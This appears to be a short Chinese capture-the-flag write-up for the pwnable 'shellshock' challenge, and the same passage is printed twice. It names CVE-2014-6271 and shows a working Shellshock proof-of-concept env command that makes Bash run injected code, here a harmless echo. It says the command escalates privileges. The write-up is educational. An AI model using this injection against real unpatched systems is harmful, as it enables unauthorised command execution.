10.shellshock
复制本地路径 | 在线编辑
Nothing worth recording...
就是利用一个已发布的 bash 漏洞,CVE-2014-6271,POC 如下
shellshock@pwnable:~$ env x='() { :;}; echo HELLO' ./bash -c :
HELLO
即上面的 env 命令可以提权,这道题算是能帮小白知道 CVE 是什么已经如何利用。
Nothing worth recording...
就是利用一个已发布的 bash 漏洞,CVE-2014-6271,POC 如下
shellshock@pwnable:~$ env x='() { :;}; echo HELLO' ./bash -c :
HELLO
即上面的 env 命令可以提权,这道题算是能帮小白知道 CVE 是什么已经如何利用。